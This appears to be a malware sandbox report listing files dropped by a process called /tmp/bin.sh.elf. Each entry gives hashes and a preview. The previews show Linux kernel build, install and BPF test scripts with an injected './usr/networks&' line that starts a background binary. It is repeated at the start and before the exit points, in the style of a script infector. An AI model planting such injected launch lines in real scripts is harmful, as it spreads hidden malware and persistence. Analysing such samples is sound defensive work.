                                                                        SSDEEP:24:rUaqf4HZd6VUZD74+jhoCRlpBmafh4MKgQ5Ipxa/Smxan6J+WmpE:rUaqf4HCVk7+CRlpfh4M3QqpQ/zxa6JN
                                                                        MD5:616785607E8CA9E920649194171B6910
                                                                        SHA1:00FAD3EA514561388B1A1BC2972E1EC817C2A518
                                                                        SHA-256:E43189451F97664D57D2D137231EFD4B8F1E831E8B0656C51D21C8670314F9DA
                                                                        SHA-512:6903D18350AAD87A5E1AC0D9B9BF5DC94369A56B826BB49FF23B2EF4418CF0E142D30413ED3737770B1B8A38967DF5CDC266300D41D562EE1F770EEC26E890FD
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..# Have Kbuild supply the path to objdump and nm so we handle cross compilation..objdump="$1".nm="$2".vmlinux="$3"..# Remove from the bad relocations those that match an undefined weak symbol.# which will result in an absolute relocation to 0..# Weak unresolved symbols are of that form in nm output:.# " w _binary__btf_vmlinux_bin_end".undef_weak_symbols=$($nm "$vmlinux" | awk '$1 ~ /w/ { print $2 }')..bad_relocs=$(.$objdump -R "$vmlinux" |..# Only look at relocation lines...grep -E '\<R_' |..# These relocations are okay..# On PPC64:..#.R_PPC64_RELATIVE, R_PPC64_NONE..# On PPC:..#.R_PPC_RELATIVE, R_PPC_ADDR16_HI,..#.R_PPC_ADDR16_HA,R_PPC_ADDR16_LO,..#.R_PPC_NONE..grep -F -w -v 'R_PPC64_RELATIVE.R_PPC64_NONE.R_PPC_ADDR16_LO.R_PPC_ADDR16_HI.R_PPC_ADDR16_HA.R_PPC_RELATIVE.R_PPC_NONE' |..([ "$undef_weak_symbols" ] && grep -F -w -v "$undef_weak_symbols" || cat).)..if [ -z "$bad_relocs" ]; then..exit 0.fi..num_bad=$(echo "$bad_relocs" | wc -l).echo
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):50
                                                                        Entropy (8bit):4.03572875064339
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVaBQSXVOORgn:wSMn
                                                                        MD5:804DDBE985C6034E697B31A2C2B0135D
                                                                        SHA1:8E947C859C562B20CF6FF00522349EC43E7C6F8B
                                                                        SHA-256:D358BBDC7C1B9747D321DEEA37D1E83946CD7D046050021A84FAAB17A65A6892
                                                                        SHA-512:A355120B8241DE555E782E07745446BD5970905F9ED645D896E8BA17348EE44216F715BF79A1A228FEB0FAECAC3CC06B26BC0A6745DD385782BADFBFC9769D00
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 0.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):716
                                                                        Entropy (8bit):5.188740504939567
                                                                        Encrypted:false
                                                                        SSDEEP:12:cngowa2h12l3mGXHFMyHFtfBjCksL49ysL7FwuIG7n:M4+XKyrZPsL4QsL7FwuIc
                                                                        MD5:E233F7425841D915F481DD78C9518D4D
                                                                        SHA1:68CF549CF969E9786FF3BCECA2C5976C678C2358
                                                                        SHA-256:FD438227D3E0DD70A5FE641C67B5F8148482357EFAE725A542EA930EA3E95C30
                                                                        SHA-512:4F99D3541DFD43BB317020AA734A91FB4712D817716C5F3F0774BDDB05D2393EB04391AD5DE0A27F6F904BFCF3BC7BD551481F2F138956A745DD5FE23F1DCFFA
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script.if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..if [ "$(basename $2)" = "Image.gz" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):518
                                                                        Entropy (8bit):5.221872442078692
                                                                        Encrypted:false
                                                                        SSDEEP:12:cngowa2h12l3mGnHFMyHFt9n2M2V/b3P2n:M4+nKyr92M2lS
                                                                        MD5:69819922FB9DBF095FA1F4AC01F6B37C
                                                                        SHA1:C2A5FD4AE7B020D453173D20306EF002AA69CDAA
                                                                        SHA-256:571C340D1F044789BC98AE272312D0A3B477520A10DD292F4B8F572D95362772
                                                                        SHA-512:33C4A288C00BEEDD6C558412977FFA9D0EDD2D24FC3868F5AEB80BBEECE90C34D86FA5153417BD5E1FD19B36E0BEAB93552769EB7219AE071A919B6A20474E10
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script..if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..# Default install - same as make zlilo..if [ -f $4/vmlinuz ]; then..mv $4/vmlinuz $4/vmlinuz.old.fi..if [ -f $4/System.map ]; then..mv $4/System.map $4/System.old.fi..cat $2 > $4/vmlinuz.cp $3 $4/System.map../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):115
                                                                        Entropy (8bit):4.352261167967631
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVxJjVvqJehDIAtQhLMWZKeKeBHvrjUv6viXVOORgn:aJQJRAiBIeHTov6viMn
                                                                        MD5:CF0DF14B2542B49CC430815F52210FB2
                                                                        SHA1:57F85D438B7B483317A0369336E7FAE77F416B94
                                                                        SHA-256:AE1F21EF3B288AC922174882D038556FC6FFAA23B297ACE426CC43F610978757
                                                                        SHA-512:3A844C13254D17FC86BA21CF13F63EDF3EF081520C2A5BFDD77DAED6B3CB3B022730A391F481D4C4B315A7152C7E36A2357F4A6A426813ADDA0FE3E249947913
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit 0.else. echo "$file: undefined symbols found" >&2. exit 1.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2150
                                                                        Entropy (8bit):5.468486256940274
                                                                        Encrypted:false
                                                                        SSDEEP:48:M3ZRGLswqELBfggjXbtANxNxMxdvKYzE8cY:qZREswqmBYOIMxdTE8cY
                                                                        MD5:31D41F5211924C4632BC4C2C647F86C8
                                                                        SHA1:FB13A405867C03FE24A3BDF261EBAC76696C3A1C
                                                                        SHA-256:CC8883B933D76F68E02C2DC72A69081826AFD29546AB4D670F59B5261D5BCC7D
                                                                        SHA-512:D8754FA4D1EFEC8C9E04A9956B8DBB34052EEE4609FF58B05A83048351236EF3A1FA2B10052E16B203159044A681A60E0F28B69158159506FAC60F1855DDA006
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 1..fi.}...export MTOOLSRC=$4.FIMAGE=$2.FBZIMAGE=$3.KCMDLINE=$5.FDINITRD=$6..# Make sure the files actually exist.verify "$FBZIMAGE"..genbzdisk() {..verify "$MTOOLSRC"..mformat a:..syslinux $FIMAGE..echo "$KCMDLINE" | mcopy - a:syslinux.cfg..if [ -f "$FDINITRD" ] ; then...mcopy "$FDINITRD" a:initrd.img..fi..mcopy $FBZIMAGE a:linux.}..genfdimage144() {..verify "$MTOOLSRC"..dd if=/dev/zero of=$FIMAGE bs=1024 count=1440 2> /dev/null..mformat v:..syslinux $FIMAGE..echo "$KCMDLINE" | mcopy - v:syslinux.cfg..if [ -f "$FDINITRD" ] ; then...mcopy "$FDINITRD" v:initrd.img..fi..mcopy $FBZIMAGE v:linux.}..genfdimage288() {..verify "$MTOOLSRC"..dd if=/dev/zero of=$FIMAGE bs=1024 count=2880 2> /dev/null..mformat w:..syslinux $FIMAGE..echo "$KCMDLINE" | mcopy - W:syslinux.cfg..if [ -f "$FDINITRD" ] ; then...mcopy "$FDINITRD" w:initrd.img..fi..mcopy $FBZIMAGE w:linux.}..geniso() {..tmp_dir=`dirname $FIMAGE`/isoimage..rm -rf $tmp_dir..mkdir $tmp_dir..for i in lib lib64 share ; do
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):678
                                                                        Entropy (8bit):5.067077678929959
                                                                        Encrypted:false
                                                                        SSDEEP:12:cngSwa2h12l3mGnHFMyHFt9n2M2V/b3PBLmxgeHZENTn:Mt2+nKyr92M2lNLqVHZ4T
                                                                        MD5:1650FEC48B0B1EBD4FAB411DD00598B5
                                                                        SHA1:86D56762CA9C2B7C28AC12C563D77C67C02D0C81
                                                                        SHA-256:62AB216A96E77FC77955522C9F955D9CD9828143F49EE9FCBF6724733A9CE5EC
                                                                        SHA-512:16D867913A12644B56649640BA282C6B085484BC62F4B63A1EC038C0E69F782D283AF4A6DE89305FBD5798319E08B9BCDCB0DCCF83E43DA1C48167F703666B38
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 1. .fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script..if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..# Default install - same as make zlilo..if [ -f $4/vmlinuz ]; then..mv $4/vmlinuz $4/vmlinuz.old.fi..if [ -f $4/System.map ]; then..mv $4/System.map $4/System.old.fi..cat $2 > $4/vmlinuz.cp $3 $4/System.map..if [ -x /sbin/lilo ]; then. /sbin/lilo.elif [ -x /etc/lilo/install ]; then. /etc/lilo/install.else. sync. echo "Cannot find LILO.".fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):115
                                                                        Entropy (8bit):4.352261167967631
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVxJjVvqJehDIAtQhLMWZKeKeBHvrjUv6viXVOORgn:aJQJRAiBIeHTov6viMn
                                                                        MD5:CF0DF14B2542B49CC430815F52210FB2
                                                                        SHA1:57F85D438B7B483317A0369336E7FAE77F416B94
                                                                        SHA-256:AE1F21EF3B288AC922174882D038556FC6FFAA23B297ACE426CC43F610978757
                                                                        SHA-512:3A844C13254D17FC86BA21CF13F63EDF3EF081520C2A5BFDD77DAED6B3CB3B022730A391F481D4C4B315A7152C7E36A2357F4A6A426813ADDA0FE3E249947913
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit 0.else. echo "$file: undefined symbols found" >&2. exit 1.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):115
                                                                        Entropy (8bit):4.352261167967631
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVxJjVvqJehDIAtQhLMWZKeKeBHvrjUv6viXVOORgn:aJQJRAiBIeHTov6viMn
                                                                        MD5:CF0DF14B2542B49CC430815F52210FB2
                                                                        SHA1:57F85D438B7B483317A0369336E7FAE77F416B94
                                                                        SHA-256:AE1F21EF3B288AC922174882D038556FC6FFAA23B297ACE426CC43F610978757
                                                                        SHA-512:3A844C13254D17FC86BA21CF13F63EDF3EF081520C2A5BFDD77DAED6B3CB3B022730A391F481D4C4B315A7152C7E36A2357F4A6A426813ADDA0FE3E249947913
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit 0.else. echo "$file: undefined symbols found" >&2. exit 1.fi../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1309
                                                                        Entropy (8bit):5.19940988754545
                                                                        Encrypted:false
                                                                        SSDEEP:24:My4uj9Gzr0DOiw3AYsRH8MADesj2RzvE1JH5sp9sIP64z4l0nFF:Mkj9GzYDOigw9ADesgvEzSp97PalA
                                                                        MD5:4F84B987098D1285BF6883064BB35500
                                                                        SHA1:070B6DDCCB31680A2D55FE186C01AAEF36ED3948
                                                                        SHA-256:9CFAE1F5C0A3948E2B79FC6F22BC03E767E278AC8CC509DF9C30F93030C2CD82
                                                                        SHA-512:39CE6F8F2F12EF0303F5CB51AABB5547E724718EC426DCCD2148353FB95AA3EB2CAE471F718FBEAFC50DFE821A125028D026E1ED43799DA20386DD35D7E97B6F
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit.fi..if [ "${quiet}" != "silent_" ]; then. echo " GEN $tarfile".fi..rm -rf $cpio_dir.mkdir $cpio_dir..if [ "$building_out_of_srctree" ]; then..(...cd $srctree...for f in $dir_list....do find "$f" -name "*.h";...done | cpio --quiet -pd $cpio_dir..).fi..# The second CPIO can complain if files already exist which can happen with out.# of tree builds having stale headers in srctree. Just silence CPIO for now..for f in $dir_list;..do find "$f" -name "*.h";.done | cpio --quiet -pd $cpio_dir >/dev/null 2>&1..# Remove comments except SDPX lines.find $cpio_dir -type f -print0 |..xargs -0 -P8 -n1 perl -pi -e 'BEGIN {undef $/;}; s/\/\*((?!SPDX).)*?\*\///smg;'..# Create archive and try to normalize metadata for reproducibility..# For compatibility with older versions of tar, files are fed to tar.# pre-sorted, as --sort=name might not be available..find $cpio_dir -printf "./%P\n" | LC_ALL=C sort | \. tar "${KBUILD_BUILD_TIMESTAMP:+--mtime=$KBUILD_BUILD_TIMESTAMP}
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):8519
                                                                        Entropy (8bit):5.010306696162023
                                                                        Encrypted:false
                                                                        SSDEEP:192:n1IITVpEGos8UG+yFpA0H+QZGBCGrRGGqHmH3:n1XEBFyNqGH3
                                                                        MD5:39A54EDD0B48437669EF466EF38B47B7
                                                                        SHA1:B5C5EC2852F2D24B5F9BDAFD7B7E3BE667BF41D5
                                                                        SHA-256:795F45745B5B13BB0963162F8234FD5030286DC8952167363B62E3622FDA395D
                                                                        SHA-512:749FC804D827FB207B40E98F6B57456F8DE65218026DE106DEEB6797A5344AC35EDB4F01B6C32F9AB8F9E2317B39E9149CA0D6986B095477EC17BCCD7585B6FE
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit.}..#set -x..debug_flag=0.args="$@".name="$0".netem=0.cc=x.dir="-o".dir_name="out".dur=5.flows=1.id=1.prog="".port=5201.rate=1000.multi_iperf=0.flow_cnt=1.use_netperf=0.rr=0.ecn=0.details=0.server="".qdisc="".flags="".do_stats=0..function start_hbm () {. rm -f hbm.out. echo "./hbm $dir -n $id -r $rate -t $dur $flags $dbg $prog" > hbm.out. echo " " >> hbm.out. ./hbm $dir -n $id -r $rate -t $dur $flags $dbg $prog >> hbm.out 2>&1 &. echo $!.}..processArgs () {. for i in $args ; do. case $i in. # Support for upcomming ingress rate limiting. #in) # support for upcoming ingress rate limiting. # dir="-i". # dir_name="in". # ;;. out). dir="-o". dir_name="out". ;;. -b=*|--bpf=*). prog="${i#*=}". ;;. -c=*|--cc=*). cc="${i#*=}". ;;. --no_cn). flags="$flags --no_cn". ;;. --debug). flags="$flags -d". debug_flag=1. ;;. -d=*|--delay=*). netem="${i#*=}". ;;.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):46
                                                                        Entropy (8bit):3.925523369006428
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                        MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                        SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                        SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                        SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):260
                                                                        Entropy (8bit):4.984871849319041
                                                                        Encrypted:false
                                                                        SSDEEP:6:EYIACMVZ/XVpOGd3sC2FKILoYv++rL9jLlQhoqJp/n:EYTV9ECD2oV6L9Siq/n
                                                                        MD5:916F2AEB2D17CDBE3C15DD04D58064D2
                                                                        SHA1:2EC06716D522A309762BDB8C371062A414DA4895
                                                                        SHA-256:3B8548872C68F17C6A38F85FE2283CBCAB60AA4C6C2CDEEB0FC909964A79DB31
                                                                        SHA-512:73CB59BFD923F2A136CA186E51BCE15CC2E50685C2D3B31D91993B5E742A431A334EE605AEEAC05B202825EA28CE09361B1568369AA56E8E8180513C1160EA05
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.on_exit() {..iptables -D OUTPUT -m bpf --object-pinned ${mnt_dir}/bpf_prog -j ACCEPT..umount ${mnt_dir}..rm -r ${mnt_dir}.}..trap on_exit EXIT.mount -t bpf bpf ${mnt_dir}../per_socket_stats_example ${mnt_dir}/bpf_prog $1../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2014
                                                                        Entropy (8bit):5.0777491882953285
                                                                        Encrypted:false
                                                                        SSDEEP:48:VcVBnCTe9tg1eLKG9hen3qePMReBG7QnDM:1TuGQLw3h00wMM
                                                                        MD5:1A19D3598CCE599D57F639332B1D85A9
                                                                        SHA1:8B246E85B6225F4A9B8615E6EE4588528FCBB944
                                                                        SHA-256:8B8BFE55773D8F9F48416690AB76B38C867F65C77FFDC5809BB52B0519955024
                                                                        SHA-512:7FF87CC5A6C77A2FC6D03075438DEDAE85657FBDD1D040AA1E44398766622FAC9286B92B16F508127C1316D1399966B17E42F40111B6F39E1F2D10324E95EB19
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.cleanup_and_exit().{..local rc=$1..local msg="$2"...[ -n "$msg" ] && echo "ERROR: $msg"...test_cgrp2_sock -d ${CGRP_MNT}/sockopts..ip li del cgrp2_sock..umount ${CGRP_MNT}...exit $rc.}...################################################################################.# main..rc=0..ip li add cgrp2_sock type dummy 2>/dev/null..set -e.mkdir -p ${CGRP_MNT}.mount -t cgroup2 none ${CGRP_MNT}.set +e...# make sure we have a known start point.cleanup 2>/dev/null..mkdir -p ${CGRP_MNT}/sockopts.[ $? -ne 0 ] && cleanup_and_exit 1 "Failed to create cgroup hierarchy"...# set pid into cgroup.echo $$ > ${CGRP_MNT}/sockopts/cgroup.procs..# no bpf program attached, so socket should show no settings.check_sock "dev , mark 0, priority 0" "No programs attached".check_sock6 "dev , mark 0, priority 0" "No programs attached"..# verify device is set.#.test_cgrp2_sock -b cgrp2_sock ${CGRP_MNT}/sockopts.if [ $? -ne 0 ]; then..cleanup_and_exit 1 "Failed to install program to set device".fi.check_s
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):878
                                                                        Entropy (8bit):4.988531379379293
                                                                        Encrypted:false
                                                                        SSDEEP:12:6Kbc/bQozJutgQ0e2130J0CxTXm6v2/mMgxZNSJy6vVz/mMgOZXm6vsZ/b3SJy6Y:3cDtlU5IkJ7xTF2jgfN4VzjgOZFgz34g
                                                                        MD5:FB72F29EE9AED2E8782151AA9ED02F35
                                                                        SHA1:F304ABC904938063F8E8A8FB9F43FB917FE4D9D0
                                                                        SHA-256:013F681368381CE28617A8615D2F5EE43146C987B167F402E5E40F7EBC48375D
                                                                        SHA-512:A332F61B21057CA1F217AB4AC58BF99441EEE1855ECE15AB5A14B4D9FC15AA424745EF787C2B294EC9AF1E40F1266B4EFFE2F2C1F1C232942775CB7A5DA79418
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..[ $? -ne 0 ] && exit 1.}..function cleanup {..if [ -d /tmp/cgroupv2/foo ]; then...test_cgrp2_sock -d /tmp/cgroupv2/foo..fi..ip link del veth0b..ip netns delete at_ns0..umount /tmp/cgroupv2..rm -rf /tmp/cgroupv2.}..cleanup 2>/dev/null..set -e.config_device.config_cgroup.set +e..#.# Test 1 - fail ping6.#.attach_bpf 0.ping -c1 -w1 172.16.1.100.if [ $? -ne 0 ]; then..echo "ping failed when it should succeed"..cleanup..exit 1.fi..ping6 -c1 -w1 2401:db00::1.if [ $? -eq 0 ]; then..echo "ping6 succeeded when it should not"..cleanup..exit 1.fi..#.# Test 2 - fail ping.#.attach_bpf 1.ping6 -c1 -w1 2401:db00::1.if [ $? -ne 0 ]; then..echo "ping6 failed when it should succeed"..cleanup..exit 1.fi..ping -c1 -w1 172.16.1.100.if [ $? -eq 0 ]; then..echo "ping succeeded when it should not"..cleanup..exit 1.fi..cleanup.echo.echo "*** PASS ***"../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1601
                                                                        Entropy (8bit):5.112440858569075
                                                                        Encrypted:false
                                                                        SSDEEP:48:pb3f9gh4igqE4d4JeVgAaoCJse7DPY8C0eM9gJUmotTM:pb3FWXCJse7DP/CxM9gDoto
                                                                        MD5:D52F35BFCB630EC4EAD11A16A6F5BACA
                                                                        SHA1:30B020FECA15AEC05AC60C24D787DA79FE16B91F
                                                                        SHA-256:3B082D32C10238EB8DD23AD37CF26CF2229BB77ABB4EB3C24CFBF75281AE9CBE
                                                                        SHA-512:86569E54CFDB6CE7428A87B9662762632004B0C21FB29280ADF73FC39903A3253B434464908F8C3B41466B07F135589E4AC3A37AF9D5F03796EAA8FC4EEED38C
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.do_exit() {. if [ "$DEBUG" == "yes" ] && [ "$MODE" != 'cleanuponly' ]. then..echo "------ DEBUG ------"..echo "mount: "; mount | egrep '(cgroup2|bpf)'; echo..echo "$CGRP2_TC_LEAF: "; ls -l $CGRP2_TC_LEAF; echo..if [ -d "$BPF_FS_TC_SHARE" ]..then.. echo "$BPF_FS_TC_SHARE: "; ls -l $BPF_FS_TC_SHARE; echo..fi..echo "Host net:"..$IP netns..$IP link show dev $HOST_IFC..$IP -6 a show dev $HOST_IFC..$TC -s qdisc show dev $HOST_IFC..echo..echo "$NS net:"..$IP -n $NS link show dev $NS_IFC..$IP -n $NS -6 link show dev $NS_IFC..echo "------ DEBUG ------"..echo. fi.. if [ "$MODE" != 'nocleanup' ]. then..setup_net stop..setup_bpf_cgrp2_array stop..setup_cgrp2 stop. fi.}..init_cgrp2_vars.init_bpf_fs_vars..while [[ $# -ge 1 ]].do. a="$1". case $a in..debug).. DEBUG='yes'.. shift 1.. ;;..cleanup-only).. MODE='cleanuponly'.. shift 1.. ;;..no-cleanup).. MODE='nocleanup'.. shift 1.. ;;..*).. echo "test_cgrp2_tc [debug] [cleanup-only
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):6983
                                                                        Entropy (8bit):5.201097453002275
                                                                        Encrypted:false
                                                                        SSDEEP:48:KD0zfOn/02ckJ8lSqUEc+9muBAm3kksd5EtlaC9sABgrb92EMKUP8ifWdEMKU4Ff:37KMKLqMKtFtpTiizRIK71xizKii/
                                                                        MD5:141A58D030B906BCF43FB5AA470FB627
                                                                        SHA1:4C321AF2417D8212EBA1901B263024A1283947E4
                                                                        SHA-256:8E2800663E95C6B0059A1C2E2CFE7BA9FEFEEC47859A763164E66C3177486B1F
                                                                        SHA-512:E3D6273F0F7191EC082FC984AC5463C9672CDC678965CF24EC92DBB0174D8F3835047BAFDB2F064BF58972CFC11197DC84955DD11ABFCE3217A1F1905B2C6681
                                                                        Malicious:false
